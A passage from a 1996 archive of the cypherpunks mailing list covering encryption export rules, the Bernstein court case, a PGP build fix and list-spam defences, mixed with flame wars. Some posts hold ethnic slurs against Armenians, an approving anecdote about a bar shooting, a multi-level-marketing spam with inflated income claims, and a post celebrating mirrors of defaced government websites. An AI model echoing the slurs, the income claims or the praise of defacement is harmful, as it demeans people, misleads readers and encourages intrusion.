volume of garbage and egotistical ranting that seems so prevalent in 
what should for all sakes and purposes be a discussion of cyphering 
and security. Apparently the name of this list is designed to 
mislead...because of all the posts, a grand total of 5% proved worth 
reading at all.>>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Mon, 30 Dec 1996 22:39:36 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: (Fwd) Re: Mr. May's Posts.  Other Things.
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961231063913Z-64953@INET-02-IMC.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Ross Wright

Yes, part of that "higher standard" is to keep your fucking mouth 
shut about that piece in your sholder holster.  Those that brag that 
they are packing and won't hesitate to use it are usually those that 
freeze under fire or snap at the workplace.
.............................................................

	Discussing self-defense equipment to carry...

	Student:  "How about earplugs?"

	Instructor: "We've thought about that as an 
	intimidation tool.  Some guy is hassling you 
	on the street and you start putting your ear 
	plugs in.  The guy says, 'What are you doing?'  
	You say, 'It looks like I'm going to be doing 
	some shooting here pretty soon and I don't 
	want to hurt my ears.'" 

	-Greg Hamilton-
	Self Defense Instructor
	Nov. 19, 1995


In cyberspace, elimination is accomplished with "delete" keys and "kill
files", right?
(L.Detweiler used to complain about how many cyberdeaths he had
experienced.)

Outta sight, outta mind...

   ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 30 Dec 1996 22:58:35 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: New crypto regs outlaw financing non-US development
In-Reply-To: <3.0.32.19961228225731.006b3080@netcom13.netcom.com>
Message-ID: <v03007800aeee49be1bdd@[206.217.121.121]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:15 PM -0800 12/29/96, Timothy C. May wrote:
>This very list advocates violation of the ITARs in various ways (I speak of
>"the list" as a person in the sense of the consensus of the list...there
>may not be unanimity, but the consensus of the vocal members of the list is
>obvious).

Gee, I always thought that people on this list only advocated changing the
ITAR thru legal means.  The fact that strong crypto is widely available
outside the USA is merely supporting evidence for this view.  :-)

It's nice to see some signal back instead of just the noise sent during the
Christmas attack on the list.  Thanks to all of you who provided the signal.


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Mon, 30 Dec 1996 22:36:57 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: (Fwd) Re: Mr. May's Posts. Other Things.
Message-ID: <199612310637.WAA20954@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 30 Dec 96 at 22:24, Sandy Sandfort wrote:


> And Tim never threatened Ross.  He merely posited an "if, than"
> response to a hypothetical assault.  If Ross does no slapping, Tim
> won't shoot him.  QED.  No reason to get bent out of shape.

Thanks.  You are correct.  I'm done with this thread.  Tim *Plonked*
me, not shot me.     And now back to you, Dr. V....

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 30 Dec 1996 20:54:44 -0800 (PST)
To: jimbell@pacifier.com (jim bell)
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <199612310229.SAA21087@mail.pacifier.com>
Message-ID: <199612310449.WAA01761@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> 
> At 04:33 PM 12/30/96 -0800, Ross Wright wrote:
> >This is the message I got in response to my post regarding Mr. May's
> >offensive, racist, and bigoted post about ebonics.
> 
> His comments were not "offensive, racist, and bigoted."  They were funny, 
> intentionally so.  The whole "Ebonics" issue is a hilarious example of 
> political-correctness gone mad.  Interestingly, Jesse Jackson tried to make it 
> look like the blacks were the victims, the ones most offended by the actions 
> of the Oakland schools people.  Embarrassed, maybe, victims no.
> 

In fact, along with Ebonic, another language, Sovonic, was discovered.

It is described in great detail in article 
199612300340.VAA00555@manifold.algebra.com and subsequent intensive
discussion.

Please help Sovonic gain equal recognition with Ebonic.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Mon, 30 Dec 1996 22:55:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: LAW_dno
Message-ID: <v03100c0baeee6907d4b2@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


In the 12-29-96. Computerworld:
>>>>
 Karen Epper, an analyst at Forrester Research, Inc. in Cambridge, Mass.,
 said electronic commerce companies should do more legal research than
 that.

 "Joe Programmer could create a new currency system," Epper said. "But if
 it's not supported by regulators, what do you have?"
<<<<

And there you have it.
If it's not regulated by the government, it's no good.

P.S	This was not an isolated quote, this was the central point of the article.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

Warning: Objects in calendar are closer than they appear.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Mon, 30 Dec 1996 23:01:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hardening lists against spam attacks
Message-ID: <v03007803aeee6643cfe0@[206.217.121.121]>
MIME-Version: 1.0
Content-Type: text/plain


The Christmas attack against this list shows the need to develop lists
which are resistant to attacks.  If cyberspace is to become the town square
of the next century, we need to be able to discourage brown shirts attacks
on political gatherings.  If lists are to be a major part of the political
life of the community, then they must be resistant to attacks from
knowledgeable, well financed attackers, not just the shits who were the
most recent perps.

There are several principles which should be observed:

(1) Since attacks are based on sending to the list, receiving the list
should remain substantially unchanged.

(2) Spam attacks should be throttled at the source, so they do not act as a
denial of service attack on the list server.

Here is a sketch of a protocol which attempts to achieve these goals:

(1) All messages sent to the list must be encrypted with the list's public
key.  This requirement is primarily to protect the posting token (see
below).  However, it alone will probably reduce the problem.  Certainly it
will eliminate the effectiveness of the "subscribe the list to some other
list" attacks.

(2) In order to post to the list, the poster must have a valid posting
token.  These tokens are available, in limited number, anonymously.  Tokens
remain valid unless canceled for abuse.  However, if too many posts are
received with a given token, TCP performance on sockets using that token
may become arbitrarily slow (or the circuit may be dropped).

(3) In order to limit the number of posting tokens, the list server will
only issue a few per day.  The lucky few who get them, everyone who asks
under normal circumstances, may be determined by an algorithm designed to
limit token collection by future attackers.  (This area is where this
proposal needs work!)


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 30 Dec 1996 21:14:54 -0800 (PST)
To: rwright@adnetsol.com (Ross Wright)
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <199612310325.TAA16845@adnetsol.adnetsol.com>
Message-ID: <199612310512.XAA01985@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Ross Wright wrote:
> 
> On or About 30 Dec 96 at 18:03, Blanc Weber wrote:
> 
> > You have to understand - Tim is from California.
> >  If you choose to carry, you will be held to a higher standard of
> > behavior
> >  than those that don't.
> 
> Yes, part of that "higher standard" is to keep your fucking mouth 
> shut about that piece in your sholder holster.  Those that brag that 
> they are packing and won't hesitate to use it are usually those that 
> freeze under fire or snap at the workplace.
> 
> A true shooter shut's the fuck up and if needs be, let's the weapon 
> do the talking when the time is right.

I think that legally, if someone who is simply slapped in the face and
is feeling no danger to his life (ie, if the slap is sort of theatrical
and it is obvious) shoots the slapper, he may be charged with some sort
of crime. I would appreciate if lawyers on this list commented on
whether shooting is or is not appropriate in this case.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: secure@access.usa.net
Date: Mon, 30 Dec 1996 19:39:08 -0800 (PST)
To: mailman42@juno.com
Subject: Happy New Year
Message-ID: <199612310315.UAA09244@earth.usa.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear Friend,

If you are interested in increasing your income by using your personal
contacts, Please Consider this... Make up to $400.00 per deal by
giving away security systems

Secure America Highlights

1.  It only cost $45 to become a distributor and for that you receive
a black glove leather brief case with everything you need to get
started;  forms, full color brochures, and a video tape telling you
about the company, its product and marketing plan.

2. The company offers 100% financing to those buying the product- they
have four institutions and can finance most everyone.  If your
prospective customer gets turned down, then with a small down payment,
the company will finance them - IN OTHER WORDS, - ALMOST NO TURN
DOWNS!    Each source, including the "company carried' contracts, will
be reported to TRW; thus helping people, who have bad or no credit,
gain the good credit they deserve.

3.  The customer receives the system for FREE when they agree to a
$29.95 per month-four year monitoring agreement, which is standard
cost for a 2-way voice monitoring.  They need to agree to either a
debit from their checking account or credit card each month.

4.  You as the distributor receive a commission of up to $400 - once
the buyer is approved and financed.  The company pays commission
weekly.  The commission is paid even before the buyer makes their
first payment.  And this is important.  There are never any charge
backs!

5.  You, as the distributor can sign up others distributors and
receive bonuses of $120 to $320 per sale from distributors under you.
The marketing plan offers a very attractive bonus plan.  By signing up
one new distributor, who does the same within a month, and this
pattern continues with each new person only bringing one new
distributor, there would be more than 4,000 distributors in your
organization at the end of a year.  Keep in mind that you only brought
in one person each month.  If each person in your organization sold
only one system per month, your income would be more than $800,000 the
first year!  What if your organization only did 1/3 of that?  Would
you be excited?

6.  You can set up businesses who can give these away as premiums to
their customers, Carpet dealers, appliance dealers, auto dealers, real
estate offices, home improvement companies, just to name a few, can
give their customers a certificate for a free system upon activation
of a four year monitoring contract.  The certificate  will have your
name on it and all they have to do is contact you for the system.  You
get them approved and get the commission - It's that simple!  If you
want, you can pay the business a referral fee of say $25, $50, or $100
or even better yet sign them up as a distributor and get continuing
overrides and bonuses on them.

7.  No Installation worries on your part.  The system is wireless,
needs no professional installer and comes with an installation video
that walks the customer through the installation process. Installation
will take about 20-30 minutes.

8.  You can market to both home owners and renters - in fact, nobody
is going after the rental market at this time.  Think about it, do
renters want any less protection than homeowners?  What a gold mine!
When someone moves, they take their security system with them and set
it up, with our nationwide monitoring company, at their new location
(keep in mind that the system is hooked up to the customers' regular
phone line).  

9.  No Inventory.  You do not have to buy anything or make a huge
investments in products just to store  them in your garage.  Once you
sign someone up for a system, you turn the paperwork into the company,
they process the application (usually within 48 hours),  and ship the
system to the customer - no deliver or installation hassles for you!

10.  No Accounting.  The company keeps track of everything for you and
give you a computer printout of your sales and organizational activity
each month.

11.  The Need.  September 17, 1996 U.S. Justice Department statistics
show that last year burglaries, theft, and theft of motor vehicles
were 288 per 1,000 households and yet only 15% of the homes in America
have security systems.  We can offer monitored protection and peace of
mind for only $1 a day and save 10-20% on home insurance premiums.

12.  The Equipment.  TWO-WAY VOICE  systems let the monitoring company
listen throughout the home (after alarm activation) for burglaries,
medical, or emergency needs, or fire department help.  In fact more
and more cities are starting to charge non two-way system owners for
false alarms.

13.  The Company.  Secure America has spent more than two years in
developing this state of the art equipment system, marketing plan, and
available $100 million in financing.  This is a one of a king company
- no inventory to stock - no huge investments - no money up from the
buyer - weekly payment of sales bonuses - and there is NO Competition
for this type of system at this price.

14.  The Opportunity.  What a great feeling!  We get to Give Away a
system that can do so much for family safety and peace of mind.  And
whether you would like to make an extra $300 a month or have visions
of grandeur, this program can satisfy your needs.  The financial
bottom line...  There will be many millionaires made through Secure
America in the next few years.
________________________________________________

Product Package Information:

3000M Gardsman Alarm System - Monitoring Fee $24.95/Month
Main Unit(3000M)     			X1
Motion Sensors				X2
Magnetic Sensors				X2
Keychain Remote controls			X1
Strobe light Siren				X1
Window Decals				X2
Commission-$200

5000M Gardsman Alarm System - Monitoring Fee $29.95/Month
Main Unit(5000M)     			X1
Motion Sensors				X2
Magnetic Sensors				X2
Keychain Remote controls			X2
Strobe light Siren				X1
Window Decals				X4
Lawn Sign	                              			X1
Commission-$300

For an application, Please Email me your fax number or Mailing address
and phone number.  Look forward to hearing from you
or call our Fax on Demand 1 703-736-1600 Doc#280




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Mon, 30 Dec 1996 20:17:28 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: OCR and Machine Readable Text
In-Reply-To: <v03007800aeedb91b8f28@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961230220741.999A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Dec 1996, Timothy C. May wrote:
> Of course, there are vastly easier and cheaper routes, such as just sending
> the stuff directly, but this makes the point that there is no difference
> between text and machine readable text.

Someone else mentioned it, but consider...sending faxes of the printed
text.  Or scanning in a document to fax format and attaching the fax
document to an outgoing e-mail.  How would putting up a fax document for
FTP be considered?  (Much less PDF and/or Postscript)  The line is so
shaky, it's non-existent. 

The whole thing is so absurd and the intent so clear.  Lucky has predicted
that a pro-GAK bill will be introduced into Congress within the New Year.
Considering the language in this latest executive order, anyone have any
insights into how this bill might be worded and the provisions it might
contain?

The biggest question:  will GAK be mandated for import as well as export?
(What are the current regs on import of munitions, anyway?)

_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 30 Dec 1996 20:45:51 -0800 (PST)
To: Cypherpunks Mailing List <adam@homeport.org>
Subject: Re: Building PGP on Freebsd?
In-Reply-To: <199612310247.VAA06642@homeport.org>
Message-ID: <Pine.LNX.3.95.961230234115.2038B-100000@eclipse.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 30 Dec 1996, Adam Shostack wrote:

> I get this message at the end, for building with the netbsd or the
> 386bsd config file.  I know theres a simple tweak, can someone remind
> me what it is?
> 
> Thanks,
> 
> Adam
> 
> 
> 
> gcc -o pgp pgp.o crypto.o keymgmt.o fileio.o  mdfile.o more.o armor.o
> mpilib.o mpiio.o  genprime.o rsagen.o random.o idea.o passwd.o  md5.o
> system.o language.o getopt.o keyadd.o  config.o keymaint.o charset.o
> randpool.o noise.o zbits.o zdeflate.o zfile_io.o zglobals.o
> zinflate.o zip.o zipup.o ztrees.o zunzip.o rsaglue2.o _80386.o
> _zmatch.o   ../rsaref/install/unix/rsaref.a
> rsaglue2.o: Definition of symbol `_NN_ModExp' (multiply defined)

You can either comment out the function "NN_ModExp" in the file nn.c in rsaref
or not define "USEMPILIB".


Mark
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsibJCzIPc7jvyFpAQE7Mgf/R7JvLkAZ7+lOn4FAjsGa8qtzgt114pYG
9xNXIavZzti43fGvZa0jRjXO1honm/gKMrQ9IlZZdIrRISpdJSeuqNrKewD1WCsK
HFoohgxqch0BZgBQkxMG62XXuAK+v1B7ZDMIyipiUY4zuOtN0KVlpd3M0ZVT6GD7
L545XHlLDaOnH1He+CH+CPGM/ZeyDAlUo/vb0T8eue1ewqNemS1V/T03O2z8VgX3
kq2dznn/pNL7pLnymPPdB03iRFLKFg7MjYeW2/VuGAMy2j0adlWsDqaE18J48A9u
6Z/1pEcT05A3cXET3GB2nfGhaTx+MOnEJQ/rl6ZJ6gSEmmEnD/5kiA==
=DTM+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Dec 1996 21:11:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Crypto reg clarification from Commerce Department
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-961231013819Z-64772@INET-02-IMC.microsoft.com>
Message-ID: <iLBsZD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber <blancw@microsoft.com> writes:

> These make more sense with the following modifications to the
> clarification:
>
>  (c) Definition of U.S. person. For purposes of this section, the
> term U.S. person includes:
>     (1) Any retard who is a citizen of the United States, a
> permanent resident alien from Planet X, or a protected person
> formerly-known-as-criminal as defined by 8 U.S.C. 1324b(a)(3);
>     (2) Any juridical organization under surveillance by the United
> States or any jurisdiction within the United States, including foreign
> branches; and
>     (3) Any Borgs in the United States.

Dandruff-covered lying Armenian scum are NOT U.S. persons.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 31 Dec 1996 00:19:48 -0800 (PST)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <199612310512.XAA01985@manifold.algebra.com>
Message-ID: <32C8CB9D.3064@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:
> Ross Wright wrote:
> > On or About 30 Dec 96 at 18:03, Blanc Weber wrote:

> > Yes, part of that "higher standard" is to keep your fucking mouth
> > shut about that piece in your sholder holster.  Those that brag that
> > they are packing and won't hesitate to use it are usually those that
> > freeze under fire or snap at the workplace.
> > A true shooter shut's the fuck up and if needs be, let's the weapon
> > do the talking when the time is right.

> I think that legally, if someone who is simply slapped in the face and
> is feeling no danger to his life (ie, if the slap is sort of theatrical
> and it is obvious) shoots the slapper, he may be charged with some sort
> of crime. I would appreciate if lawyers on this list commented on
> whether shooting is or is not appropriate in this case.

Forget the law.  If you don't plea-bargain, you have to face the jury.

What's the jury gonna do?  Depends on a mixture of their own knowledge
and feelings, and whatever instructions the judge gives them.

1. Your state of mind re: defending yourself will influence the jury.
2. The judge's instruction as to necessary force will influence them.
   (Understand that your situation is not the same as a police officer)
3. The jury's decision about whether your actions were appropriate,
   based on what they think your options or rights were.

Juries do not, in my memory, let people off the hook when they shoot
a person who is suspected, say, of raping their child, as the woman
did in (the Bay area?) a couple years ago.

OTOH, juries do sometimes allow pretty amazing extenuations.  The case
in Meigs County Tenn. circa 1986-87, when the man in the bar was being
harrassed by acquaintances - he went out to his truck, got some guns,
and came back in and blasted two or three guys.  He got off clean.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 30 Dec 1996 23:10:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: (Fwd) Re: Mr. May's Posts.  Other Things.
In-Reply-To: <c=US%a=_%p=msft%l=RED-81-MSG-961231020328Z-64844@INET-02-IMC.microsoft.com>
Message-ID: <4ZcsZD38w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber <blancw@microsoft.com> writes:
>
> You have to understand - Tim is from California.

And Ray Arachelian is a dandruff-covered Armenian louse larva.

Is that an excuse for their bad manners?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 31 Dec 1996 00:30:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: If He Doesn't Like Me
In-Reply-To: <199612310620.WAA20583@adnetsol.adnetsol.com>
Message-ID: <v03007800aeee7fd019f2@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:45 AM -0600 12/31/96, Igor Chudov @ home wrote:
>gentlemen, why don't you relax:

Igor, such advice to "why don't you relax" is unwanted. I did not post my
mail to Ross Wright, while he has posted not only my private mail to him,
but has also written half a dozen other of us his " Fuck You, Too, Timmy! "
messages (I'm now looking at this creep's stuff before emptying my trash,
to see what this twit is up to).

Your message is the equivalent of that brain-damaged ebonite's "Why can't
we all just get along?"

--Tim May


Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 30 Dec 1996 23:22:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: premail.
Message-ID: <199612310718.BAA02863@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Anonymous wrote:
> 
> A scenario:
> 
> 1) The spooks put a bug (named Eve) on the link between
> kiwi.cs.berkeley.edu and the Internet.
> 
>    Whenever kiwi.cs.berkeley.edu sents out the pubring.pgp Eve intercepts
> it and replaces it with a file of the spooks' choosing. This file will
> selectively replace the public pgp keys of some of the remailers (say exon)
> in pubring.pgp with keys to which the spooks know the private key.
> 
> 2) A similar bug is put on the link between the exon remailer and the
> internet. All email to exon is intercepted, and if found to be encrypted
> with the spooks' PGP key, it is decrypted, saved, re-encrypted with exon's
> real PGP key and sent on.
> 
> It is only a scenario. I am still using premail to send this.
> 

A good scenario. A truly paranoid premail users should verify who signed
the remailer keys. If you trust the signators and they signed the keys, 
you are "safe". Just do pgp -kvv some@remailer.com and see what comes up.

Maybe remailer operators should asks someone reputable to sign their
remailers' keys so that the users can easily verify the signatures.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skeeve@skeeve.net (Skeeve Stevens)
Date: Mon, 30 Dec 1996 06:21:42 -0800 (PST)
To: www-security@ns2.rutgers.edu
Subject: USAF Hack mirror
Message-ID: <199612301421.BAA13352@myinternet.net>
MIME-Version: 1.0
Content-Type: text/plain



Another hack mirror up....

http://www.skeeve.net/usaf/

so far I have:

Central Intelligence Agency  - http://www.skeeve.net/cia/
US Department of Justice - http://www.skeeve.net/doj/
Kreigman Furs - http://www.skeeve.net/kriegsman/
US Air Force - http://www.skeeve.net/usaf/

we these people never learn... put your webserver on CDrom today ;)

anyone else know of any other mirrors... i heard www.nasa.gov recently got
done.. anyone have a mirror i can add to the collection?


 ---------------------------------------------------------------------
| Skeeve Stevens - MyInternet    personal.url: http://www.skeeve.net/ |
| email://skeeve@skeeve.net/     work.url: http://www.myinternet.net/ |
| phone://612.9869.3334/         mobile://0414.SKEEVE/      [753-383] |
 ---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Tue, 31 Dec 1996 01:28:28 -0800 (PST)
To: cypherpunks, gnu
Subject: Professor Asks for Constitutional Review of New Encryption Regs
Message-ID: <199612310928.BAA00890@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[Thanks to all the local c'punks for your support of this court case!
 If we do end up asking for a temporary restraining order, there'll
 probably be another hearing soon.  I'll give you as much notice as
 I have. --gnu]

	PROFESSOR ASKS FOR CONSTITUTIONAL REVIEW OF NEW ENCRYPTION REGS
	   "Shell Game" Attempts to Continue Unconstitutional Rules

December 30, 1996

                                Electronic Frontier Foundation Contacts:

                                     Shari Steele, Staff Attorney
                                      +1 301 375 8856, ssteele@eff.org

                                     John Gilmore, Founding Board Member
                                      +1 415 221 6524, gnu@toad.com

                                     Cindy Cohn, McGlashan & Sarrail
                                      +1 415 341 2585, cindy@mcglashan.com

San Francisco - Laywers for Professor Dan Bernstein today asked the
Government to delay enforcement of new encryption restrictions until
they can be reviewed by a court for Constitutionality.  The new
regulations contain the same features struck down earlier this month
by Judge Marilyn Hall Patel.

"The government apparently decided to ignore Judge Patel's findings.",
said Cindy Cohn, lead attorney in the case.  "Instead of listening
to Judge Patel's analysis and attempting to fix the regulations, they
simply issued new ones with the same problems.  We are giving them a
a chance to fix this before we bring the issue up in court."

President Clinton ordered on November 15 that the regulations be moved
from the State Department to the Commerce Department.  Judge Patel's
decision of December 6 (released December 16th) struck down the State
Department regulations as a "paradigm of standardless discretion" that
required Americans to get licenses from the government to publish
information and software about encryption.  Over Christmas, the
Clinton Administration published its new Commerce Department
regulations, containing all the same problems, and put them into
immediate effect today.

The new regulations once again put Professor Bernstein at risk of
prosecution for teaching a class on encryption and publishing his
class materials on the Internet.  His class begins on January 13 at
the University of Illinois at Chicago.

Professor Bernstein's letter of today proposes that the Government
agree to delay enforcement of the new regulations while Judge Patel
reviews them for Constitutionality.  Failing that, Professor Bernstein
will ask the court for a temporary restraining order to block
their enforcement.

"The government is forcing us to go back to Judge Patel again to have
the new regulations declared facially unconstitutional." said Ms.
Cohn.  "This time we believe that a nationwide injunction against
their enforcement is merited."

"The new encryption rules are a pointless shell game," said John
Gilmore, co-founder of the Electronic Frontier Foundation, which
backed the suit.  "Industry and Congress had asked that the draconian
State Department regulations be eliminated in favor of existing,
reasonable, Commerce Department regulations.  Judge Patel invalidated
the State Department regulations because they were draconian.  Rather
than address the concerns of either, President Clinton moved the
draconian regulations into the Commerce Department -- and made them
tougher in the process.  It's his political decision whether to ignore
and anger industry leaders, but he can't ignore a federal district
court judge."

Civil libertarians have long argued that encryption should be widely
deployed on the Internet and throughout society to protect privacy,
prove the authenticity of transactions, and improve computer security.
Industry has argued that the restrictions hobble them in building
secure products, both for U.S. and worldwide use, risking America's
current dominant position in computer and communications technology.
Government officials in the FBI and NSA argue that the technology is
too dangerous to permit citizens to use it, because it provides privacy
to criminals as well as ordinary citizens.

	Background on the case

The plaintiff in the case, Daniel J. Bernstein, Research Assistant
Professor at the University of Illinois at Chicago, developed an
"encryption algorithm" (a recipe or set of instructions) that he
wanted to publish in printed journals as well as on the Internet.
Bernstein sued the government, claiming that the government's
requirements that he register as an arms dealer and seek government
permission before publication was a violation of his First Amendment
right of free speech.  This was required by the Arms Export Control
Act and its implementing regulations, the International Traffic in
Arms Regulations.  The new regulations have the same effect, using the
International Emergency Economic Powers Act, the Export Administration
Regulations, and a "state of national emergency" that President
Clinton declared in 1994 and has re-declared annually.

In the first phase of this litigation, the government argued that
since Bernstein's ideas were expressed, in part, in computer language
(source code), they were not protected by the First Amendment.  On
April 15, 1996, Judge Patel rejected that argument and held for the
first time that computer source code is protected speech for purposes
of the First Amendment.

On December 6, Judge Patel ruled that the Arms Export Control Act is a
prior restraint on speech, because it requires Bernstein to apply for
and obtain from the government a license to publish his ideas.  Using
the Pentagon Papers case as precedent, she ruled that the government's
"interest of national security alone does not justify a prior
restraint."

Judge Patel also held that the government's required licensing
procedure fails to provide adequate procedural safeguards.  When the
Government acts legally to suppress protected speech, it must reduce
the chance of illegal censorship by the bureacrats involved -- in this
case, the State Department's Office of Defense Trade Controls (ODTC).
Her decision states, "Because the ITAR licensing scheme fails to
provide for a time limit on the licensing decision, for prompt
judicial review and for a duty on the part of the ODTC to go to court
and defend a denial of a license, the ITAR licensing scheme as applied
to Category XIII(b) acts as an unconstitutional prior restraint in
violation of the First Amendment."

She also ruled that the export controls restrict speech based on the
content of the speech, not for any other reason.  "Category XIII(b) is
directed very specifically at applied scientific research and speech
on the topic of encryption."  The new regulations continue to insist
that the Government is regulating the speech because of its function,
not its content.

The judge also found that the ITAR is vague, because it does not
adequately define how information that is available to the public
"through fundamental research in science and engineering" is exempt
from the export restrictions.  "This subsection ... does not give
people ... a reasonable opportunity to know what is prohibited."
Judge Patel also adopted a narrower definition of the term "defense
article" in order to save it from unconstitutional vagueness.


ABOUT THE ATTORNEYS

Lead counsel on the case is Cindy Cohn of the San Mateo law firm of
McGlashan & Sarrail, who is offering her services pro bono.  Major
additional pro bono legal assistance is being provided by Lee Tien of
Berkeley; M. Edward Ross of the San Francisco law firm of Steefel,
Levitt & Weiss; James Wheaton and Elizabeth Pritzker of the First
Amendment Project in Oakland; and Robert Corn-Revere, Julia Kogan,
and Jeremy Miller of the Washington, DC, law firm of Hogan & Hartson.


ABOUT THE ELECTRONIC FRONTIER FOUNDATION

The Electronic Frontier Foundation (EFF) is a nonprofit civil
liberties organization working in the public interest to protect
privacy, free expression, and access to online resources and
information.  EFF is a primary sponsor of the Bernstein case.  EFF
helped to find Bernstein pro bono counsel, is a member of the
Bernstein legal team, and helped collect members of the academic
community and computer industry to support this case.

Full text of the lawsuit and other paperwork filed in the case is
available from EFF's online archives at:

        http://www.eff.org/pub/Privacy/ITAR_export/Bernstein_case/

The full text of today's letter from Professor Bernstein to the 
Government, and proposed stipulation, are at:

        http://www.eff.org/pub/Privacy/ITAR_export/
	       Bernstein_case/Legal/961230.letter
        http://www.eff.org/pub/Privacy/ITAR_export/
	       Bernstein_case/Legal/961230_proposed.stipulation

The new Commerce Department Export Administration Regulations are
available at:

	http://www.eff.org/pub/Privacy/ITAR_export/961230_commerce.regs




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 31 Dec 1996 00:27:53 -0800 (PST)
To: rwright@adnetsol.com (Ross Wright)
Subject: Re: If He Doesn't Like Me
